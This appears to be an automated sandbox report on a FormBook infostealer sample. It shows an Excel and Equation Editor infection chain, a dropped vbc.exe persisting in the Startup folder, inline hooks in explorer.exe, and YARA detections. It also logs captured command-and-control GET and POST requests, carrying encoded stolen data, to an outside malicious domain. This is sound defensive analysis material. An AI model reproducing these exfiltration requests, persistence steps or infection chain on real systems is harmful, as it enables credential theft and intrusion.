                                                                                                                                                      Data Ascii: bF=6pxUf3XRYf0MoRoAO84WJH81A4My4kaKOepO1ug-TuAvI9QCK43H5gqXKattYB8dPDAl19iufaMoitZdYwTjqkm8nhK02TK_kMPGtBwjIbRxiT4ilzGqZvVxlttgifXoaA~ALbbDPuMtV4K05IDE8lylC6Ax9URKbTt_h0xlI7odrBeaK4brQmXC19W9JujpkHJLVKenW4b9CclnnhkFG-IPnR2vt5flzDOsOFU9gcrI03bdG1xU~AdNWs(ohpysl-LjAgLPuBwPZvY7zZLehYTM7eAE6dSyLhI1RowdxXm-LH4in8aefeSn76xa7jCI8lK34sYcK5SKoJLV4s4gr-2i5vV0FfJTrWUZ4W0xyDjqwc2Exl5xO55HaRwy5lPlsIeI1Ab1oIbGuzVx4nZJlKQdgHk2M-7zivXyTheJ37W9IHzIw3nhfwIgG4qTE-6haA9scMYUAc9ynSgWVgFSa5g8AlsOd3ZjpfBGM8LfpEkUjFRH(u1JcnCv6N(d79sePN3agP44atpd~Kdfm-DnHurLjq61guKaBeIKe9bBlzqqf6lulEczrrnKW4g7xEr6srIkZyHhG2wQBcgtc2IUh08KPVBJ7DIqDVOp8_fzumEV~SCm(klC4KLS~iwxF-tLrfYTyf2lZNGNjVkGyL7XKg~snEOcWNB8yy5KhDhaDn7CNNjEJNJe~PAIPXyYbIEqFJlx~TJ5xVi2L9U9bBbz3ddoJS04OsT6rFxZTAcXOMvQTyIasyEJfvwlurBMS4i9aJ9PB8N5ooyilqey5SxnZ3GaTiTHuCAKuH23NvZ3zyq6KzcAPg1lsz(BjHvYpwZnX9tYlOgIygrQFG3pEcHGLBY8NFqUKURin-cSBJ5oZfhQUEaD6zwxKU9KBxDtHgo20MwWYfO4Q8HeCsXjVVWuClA8pWe6GR6i5E6EON3Nn9Albm~5WdVYtItcOtTqOWQS3142kv0dAQy7LftLxXlZ(osIZ4uhV584wfn8ywIID5s8qft8Apao51LECt2WVZy2sPTPvLaEN3OBoxj4zeXy7vPhqDJ5EuJYevZVlRZzSUX9eicz4AxPuiB4Gkz2u_7kFv7DvLdwx4geGqqYXY5gOH8YStzgT7rYWMB_8SFT32WXkMtk2w~ooL4-UH0I5uqDi5LixkXPv-G2wm2BFCd59wOj2_owB7Cat_dZUNNWd2(s7TOLOdfG9ShJu_2NP7g-U8xpxeaY0-iiVaXW1Q7Ay8oLlBZDfvc8zyS6r5gGK2Caty460BR7~hUeYXCKplrVSj04EBGXOa3NukEvCfb5t98QNesfHKS-CB9hldcwekjJoAvDSINO0miM(UZpE3LneyQTg1UoJS6ZwswbvG1pSW2g08Gcck44RBjNLlS5WqN0NfsXSkfn4izMd9OCbf3xrQrUqSAGwJ(o1w4dSbhKnOp_(E1hXVNQHB9HbJsyCVx76aWZr5BJD2Y3R91RaGA4OSU2DP5JPGbQ1Rx8RiJexpXT9knKy4bMQWu54JZFSdzzRRtXIwVAlYLShwarH2XOyvp72rd9SVOhZLAuasFuKQ0hUOjTkQSZbZwBXMs0HMqvd0vmnSrcYs10fIdOSF~FmcN7OlSwcGFY014MdSY59R~uWD56IZfw53Pn9YF7~Zw3bR0sVmvcKK3gsZ5ciwjAWoZATelnqPhVxZUiq_iV493BE1Hz5hJVs6lEBKNjKeGki9MJ0p5g47vSmjZ_xHovvl25(1IdcVNJ6vmLfgsj9SRwPshLx60vxEnWeILA9TxEK0SCKJMA8W5auIjaDHWiTZonLRWAdUfGCcSCWWfLkHfONbhzz7zwa843IvVYbDU2QGmWh7j8NSOIOhtvzWJydWMUqV5TdPqAOfMfGJ9Pl8ogWt~Xlp~3dw1vfG(7oOFsX3oB5k7LYpRBzrTVdsQlqlO0C6EWDRUJfRXSg8Sb4e8oNOX70dJmGvdxNgvvhWih9x4hd40yW_DsYVfnN5XCFRqnDqqobEJhh_uAVK3MBL7JGwQcn1z1EYBQRpJo(5WS0MJd3rT7j6wxvvezGQWoMSTGw0QDsRCJubg0t7QnGHs_2ShCMFVxqoaF~nQFHnd7r1tRHoKfwaUf5kuCfhWUmuKVBnq6q0CmoLyRPbFZvG83qXUnLZn-x-jwE0g4DiTpZpLu8-y9Zgj4jalssCEQYB8mGzZuO42jQVjsapeuz1FZCRtIzf73m55EQfgAwGFg9V~TvAWrpWWI(A9-QPZWhQa6rQfKAMMYZG2Elw17uwaHWKUvDju6GFtEXbre6pV05Ar
                                                                                                                                                      Nov 27, 2020 12:16:45.849770069 CET437INHTTP/1.1 403 Forbidden
                                                                                                                                                      date: Fri, 27 Nov 2020 11:16:45 GMT
                                                                                                                                                      content-type: text/html
                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                      server: NginX
                                                                                                                                                      content-encoding: gzip
                                                                                                                                                      connection: close
                                                                                                                                                      Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      3192.168.2.2249168184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 27, 2020 12:17:04.179198980 CET438OUTGET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1
                                                                                                                                                      Host: www.letstalkop.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 27, 2020 12:17:04.397502899 CET438INHTTP/1.1 301 Moved Permanently
                                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                                      Date: Fri, 27 Nov 2020 11:17:04 GMT
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Location: https://livinginoaklandpark.com/lets-talk-oakland-park/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1
                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      4192.168.2.2249169184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 27, 2020 12:17:06.581669092 CET441OUTPOST /zsh/ HTTP/1.1
                                                                                                                                                      Host: www.letstalkop.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 261372
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Origin: http://www.letstalkop.com
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      Accept: */*
                                                                                                                                                      Referer: http://www.letstalkop.com/zsh/
                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      Data Raw: 62 46 3d 71 64 6b 77 28 4b 41 41 36 79 44 67 43 33 34 31 56 34 31 54 75 42 63 76 59 50 4a 6d 4b 4a 47 44 41 78 4b 4d 73 74 6d 6b 67 4f 6a 49 63 5a 37 51 62 6e 37 39 54 7a 6b 4e 53 2d 4c 38 31 6a 52 49 4a 72 74 7a 59 31 55 61 39 7a 41 56 50 5a 78 64 56 52 33 73 65 4d 62 57 61 48 32 6d 68 45 62 71 5a 6f 52 30 37 42 44 4c 43 74 46 34 38 46 4f 7a 6e 45 4b 72 4e 46 62 73 71 4b 49 61 4b 7a 57 5a 45 57 7e 77 34 55 68 44 4c 75 6f 62 54 49 50 71 67 39 59 71 4b 64 31 4c 51 4f 44 4b 35 37 77 62 28 32 28 78 74 5a 6a 78 31 4c 36 42 63 74 64 6d 5a 66 4c 39 48 66 55 43 6e 4a 48 54 54 2d 72 6b 37 72 42 31 43 57 50 52 52 78 35 39 52 50 34 6b 57 56 6f 41 59 61 46 44 6a 38 42 42 67 67 6e 4f 42 7a 48 36 41 32 46 5a 39 57 43 6b 44 56 4b 6d 59 44 54 42 31 53 48 63 72 4d 6e 76 51 74 71 70 4f 35 4e 39 4b 50 4d 6e 6d 73 59 59 50 65 6d 73 6c 6c 69 6e 47 64 46 52 56 7a 73 73 32 56 4e 51 4b 7a 42 4c 4a 51 70 56 68 4b 6e 49 61 48 49 6b 31 4c 6c 6b 5a 58 34 72 64 4c 41 58 54 46 42 33 46 46 39 30 30 34 30 4f 39 58 49 67 45 4e 72 2d 71 45 66 39 78 62 48 55 31 4a 77 73 56 36 69 36 7e 44 59 47 38 62 31 38 42 6d 33 75 41 63 4c 5f 6f 45 53 63 71 79 51 72 56 57 63 50 32 38 6c 50 68 4c 47 6a 71 53 7e 58 67 31 48 58 4f 42 56 6b 53 33 6e 33 4b 7a 4d 4f 51 33 55 34 35 38 66 79 4a 79 69 43 46 79 50 39 71 42 4d 79 70 33 49 72 4a 64 76 67 43 71 55 4c 45 31 48 67 66 78 54 49 67 44 64 32 55 74 28 59 7a 74 4e 73 36 44 28 74 75 64 7a 41 69 78 74 53 34 76 55 6c 79 73 59 4a 72 41 76 53 52 63 51 78 74 56 42 52 4a 5f 4d 2d 32 42 55 74 5a 38 43 4a 57 4e 6d 6d 59 69 47 78 6e 70 4a 69 54 36 4b 70 46 2d 45 70 38 6b 30 64 69 43 70 4e 32 51 4a 7a 38 64 6d 54 28 41 7e 48 38 47 59 68 50 62 79 69 36 6b 45 56 46 56 47 6a 31 38 4d 6d 50 46 70 6a 32 59 6e 74 6f 58 4d 47 47 48 4a 72 4e 58 70 61 62 4f 66 46 72 4a 41 7a 48 47 4e 38 6c 72 76 4c 79 78 7e 41 69 6c 70 62 72 67 7a 47 68 35 34 34 65 38 61 32 30 4e 6a 42 76 62 45 4b 75 52 44 51 56 5f 57 5a 74 69 51 5f 44 59 37 53 45 4d 66 4d 4d 33 55 5f 45 6c 58 49 4d 77 74 5f 7a 67 6a 46 63 5f 6f 7a 36 35 43 4d 78 4a 44 67 4d 66 38 70 63 64 67 68 43 50 61 56 49 4b 71 38 50 4e 6c 66 31 4c 49 64 7e 77 35 74 66 35 37 4f 70 6a 75 35 41 6a 44 77 54 49 52 4a 77 77 28 4e 56 43 48 69 56 4a 4e 32 76 6c 33 47 78 5a 79 68 70 69 4c 63 75 79 61 71 37 54 77 5f 6b 79 68 7a 70 47 6c 35 67 70 4c 4f 31 71 73 6b 30 30 30 4f 34 4f 56 71 72 6e 68 75 58 64 4c 47 47 46 38 52 74 4d 67 56 42 59 73 31 49 79 70 2d 39 63 4e 75 75 43 36 46 36 4d 63 59 68 33 39 58 59 4b 6b 72 53 38 79 43 6b 6c 30 56 43 45 4b 51 39 6b 63 30 32 71 38 64 57 64 64 4a 76 4e 4f 46 65 55 41 44 30 70 62 5a 6c 50 67 63 4f 78 64 2d 73 48 79 6b 44 44 4e 70 50 67 75 44 58 38 44 4a 35 70 79 6a 37 50 76 4e 53 56 57 42 6a 71 6d 71 68 45 74 55 69 53 4b 2d 74 6d 75 5a 32 35 53 41 47 6c 5a 66 6e 46 4a 33 76 4f 75 72 79 47 69 7a 28 6c 59 5f 59 66 58 45 52 33 66 41 6b 4a 58 71 6e 66 55 39 67 42 66 55 56 61 78 2d 50 64 35 42 6e 75 4e 55 47 59 6a 4f 77 71 70 79 48 6b 4d 50 37 41 4b 49 7a 56 77 6a 78 71 6a 37 59 51 4f 62 6b 30 6a 41 4c 6f 71 45 43 6e 6e 56 6a 32 76 6a 55 59 4b 75 30 68 64 4a 37 52 37 45 50 33 33 4a 42 57 41 79 4c 42 32 58 78 59 34 38 50 41 6c 64 73 39 58 50 69 4b 6c 54 42 5f 53 6c 42 33 72 30 66 44 55 69 4e 46 74 36 55 74 63 47 45 73 52 48 50 64 35 6d 66 72 46 59 69 67 50 67 50 31 54 46 49 49 71 51 55 37 5a 44 69 2d 61 56 6f 6c 37 72 35 74 63 70 48 74 65 67 77 59 4c 77 37 6e 4f 63 33 33 45 78 34 4a 72 72 4b 6e 42 67 69 37 76 59 66 54 79 61 64 34 46 4d 66 30 6e 33 56 34 44 72 28 65 74 66 5a 47 55 57 37 44 50 48 50 41 43 39 57 74 43 55 73 49 66 41 45 35 56 67 45 49 70 57 7e 54 4e 67 46 77 69 59 67 64 4b 75 37 63 4d 49 78 78 38 6c 62 37 37 2d 37 55 36 66 39 5f 75 59 47 7a 61 31 69 70 66 79 53 75 57 72 67 62 42 7a 37 68 51 61 76 69 4b 51 32 51 4c 4b 65 48 6a 77 62 68 35 73 44 36 38 32 4e 6b 6f 41 75 42 50 56 78 72 4c 6d 73 59 4c 59 33 50 48 30 43 41 6b 7a 50 41 4b 77 5a 6c 64 45 4d 32 43 44 55 6c 6d 4e 48 78 46 57 7a 42 54 6b 6e 47 45 64 66 4c 69 4d 28 47 35 51 71 52 56 33 74 71 35 6d 50 6f 4b 50 56 53 44 48 35 52 6c 65 38 76 42 5a 71 75 59 45 4a 58 6e 2d 32 43 6d 50 54 71 76 50 52 56 62 79
                                                                                                                                                      Data Ascii: bF=qdkw(KAA6yDgC341V41TuBcvYPJmKJGDAxKMstmkgOjIcZ7Qbn79TzkNS-L81jRIJrtzY1Ua9zAVPZxdVR3seMbWaH2mhEbqZoR07BDLCtF48FOznEKrNFbsqKIaKzWZEW~w4UhDLuobTIPqg9YqKd1LQODK57wb(2(xtZjx1L6BctdmZfL9HfUCnJHTT-rk7rB1CWPRRx59RP4kWVoAYaFDj8BBggnOBzH6A2FZ9WCkDVKmYDTB1SHcrMnvQtqpO5N9KPMnmsYYPemsllinGdFRVzss2VNQKzBLJQpVhKnIaHIk1LlkZX4rdLAXTFB3FF90040O9XIgENr-qEf9xbHU1JwsV6i6~DYG8b18Bm3uAcL_oEScqyQrVWcP28lPhLGjqS~Xg1HXOBVkS3n3KzMOQ3U458fyJyiCFyP9qBMyp3IrJdvgCqULE1HgfxTIgDd2Ut(YztNs6D(tudzAixtS4vUlysYJrAvSRcQxtVBRJ_M-2BUtZ8CJWNmmYiGxnpJiT6KpF-Ep8k0diCpN2QJz8dmT(A~H8GYhPbyi6kEVFVGj18MmPFpj2YntoXMGGHJrNXpabOfFrJAzHGN8lrvLyx~AilpbrgzGh544e8a20NjBvbEKuRDQV_WZtiQ_DY7SEMfMM3U_ElXIMwt_zgjFc_oz65CMxJDgMf8pcdghCPaVIKq8PNlf1LId~w5tf57Opju5AjDwTIRJww(NVCHiVJN2vl3GxZyhpiLcuyaq7Tw_kyhzpGl5gpLO1qsk000O4OVqrnhuXdLGGF8RtMgVBYs1Iyp-9cNuuC6F6McYh39XYKkrS8yCkl0VCEKQ9kc02q8dWddJvNOFeUAD0pbZlPgcOxd-sHykDDNpPguDX8DJ5pyj7PvNSVWBjqmqhEtUiSK-tmuZ25SAGlZfnFJ3vOuryGiz(lY_YfXER3fAkJXqnfU9gBfUVax-Pd5BnuNUGYjOwqpyHkMP7AKIzVwjxqj7YQObk0jALoqECnnVj2vjUYKu0hdJ7R7EP33JBWAyLB2XxY48PAlds9XPiKlTB_SlB3r0fDUiNFt6UtcGEsRHPd5mfrFYigPgP1TFIIqQU7ZDi-aVol7r5tcpHtegwYLw7nOc33Ex4JrrKnBgi7vYfTyad4FMf0n3V4Dr(etfZGUW7DPHPAC9WtCUsIfAE5VgEIpW~TNgFwiYgdKu7cMIxx8lb77-7U6f9_uYGza1ipfySuWrgbBz7hQaviKQ2QLKeHjwbh5sD682NkoAuBPVxrLmsYLY3PH0CAkzPAKwZldEM2CDUlmNHxFWzBTknGEdfLiM(G5QqRV3tq5mPoKPVSDH5Rle8vBZquYEJXn-2CmPTqvPRVbyx3x6diRhRe3exnpdlg6yT49waLzTiiLMAC6KDS2dVVspf2Nud4HMyS2tcLjIPp3Uza~ENRfVmvLHf73jHSJrmo~X8CfuGJ9seV2eV-8r2pSr3gYSvmRapeUU1z8dmhh5flzJQuNNWtAwrTZrzOoNdqoplpSO2p1lTTvTicOk06EC3n1WEXSxZQrSfOI2u0jd0z6D465-UEamGR8-TovDn18uphRx7e6VUHmoEkc4FH927bD6FsSSxyDz37ay0_5NE6MxugSCx7ADRLY4G4bam4CFMOoHKALEPMyfdR2oosAZowNPn16PjlPFhzPYe1~QTUuLiyDAOodiemI32VoRDezVG3SojfbQu_eNBPbUhFKCp9(VFJw_YsM3tEwgWy28eXTq63Exyo0KQhk9Uym62rdryOtPtfDFYr99yX7LfFUKZD(BkJmk9gEa(3ejgGF5ZkdHMvC75aD4m6P90mDDkVkkvv2uKYqlFksAa8lgqi24b8Bk1NQz4R3z8rm3ALkgfDVn1XCfzAf_U7NVV-KS~7BsF1mPF5DolF2HlYlxzg(5donu3ePxN92qOWUa3_nXfWbn1qaUnQHH(Hza8iuApYhCBBAdCJMkh0DRFmrRGHhwZz5uBjwCGbp4BpCk4ThoWPyDW3xp1LD8fQSz0vzq6vnaJaJFzvLG0ahGILRdZyFcT61oriOpbC54SmF1O7W89YbXqdrmRDcrxBrmsl57VgtpfwvkC3MjSmmmCRnDwycpW1L9FC0nbSZy2cj_mBTvN2btENxpLI9VX6LWbfz4t5OY(8jCVHrrdZ4dcB6KSuU8xfL2gGuQuSkqGCXVJevnteV_ELlgQ4ov62lFDAXS8uWK6ZAkswpehJgl9_gqgnApqLld4IIdGDBegKnZ2DKC33dmX8YbZKUXr-5lYwd


                                                                                                                                                      Code Manipulations

                                                                                                                                                      User Modules

                                                                                                                                                      Hook Summary

                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageWINLINEexplorer.exe
                                                                                                                                                      GetMessageAINLINEexplorer.exe

                                                                                                                                                      Processes

                                                                                                                                                      Process: explorer.exe, Module: USER32.dll
                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE5
                                                                                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE5
                                                                                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE5
                                                                                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE5

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:12:14:55
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x13f060000
                                                                                                                                                      File size:27641504 bytes
                                                                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:15
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:17
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0xd70000
                                                                                                                                                      File size:402944 bytes
                                                                                                                                                      MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:28
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                      Imagebase:0xd70000
                                                                                                                                                      File size:402944 bytes
                                                                                                                                                      MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:30
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:33
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe'
                                                                                                                                                      Imagebase:0xf20000
                                                                                                                                                      File size:402944 bytes
                                                                                                                                                      MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:12:15:39
                                                                                                                                                      Start date:27/11/2020
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
                                                                                                                                                      Imagebase:0xf20000
                                                                                                                                                      File size:402944 bytes
                                                                                                                                                      MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
